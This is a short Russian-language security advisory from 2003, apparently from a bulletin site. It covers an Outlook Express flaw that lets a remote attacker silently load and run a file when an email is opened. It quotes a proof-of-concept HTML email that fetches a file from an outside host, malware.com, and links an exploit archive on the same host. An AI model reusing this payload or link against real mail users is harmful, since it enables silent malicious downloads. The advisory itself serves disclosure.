Загрузка произвольных файлов в обход ограничений безопасности в Microsoft Outlook Express

Дата публикации:
22.05.2003
Всего просмотров:
858
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в Microsoft Outlook Express. Удаленный атакующий может незаметно загрузить и выполнить произвольный файл на компьютере адресата в обход любых ограничений безопасности в Outlook Express.

Сообщается, что следующий код загрузит произвольный файл при открытии почтового сообщения, в установках по умолчанию Outlook Express: RESTRICTED ZONE:

MIME-Version: 1.0
Content-Type: text/html;
Content-Transfer-Encoding: 7bit
X-Source: 05.19.03  http://www..malware.com 

<html xmlns:t>
<head><style> t\:*{behavior:url(#default#time);display:none}</style></head><body>
<t:audio  t:src="http://www.malware.com/freek.asf"  /> </body></html>
При этом никакие предупреждения пользователь не получит.

Эксплоит прилагается.

Уязвимость обнаружена в Outlook Express 6.00.2800.1123 с WMP 7.01.00.3055 и 8.00.00.4487 [WMP 9 не срабатывает!]

Ссылки: Restricted Zone: the OUTLOOK EXPRESS
http://www.malware.com/but.its.free.zip

или введите имя

CAPTCHA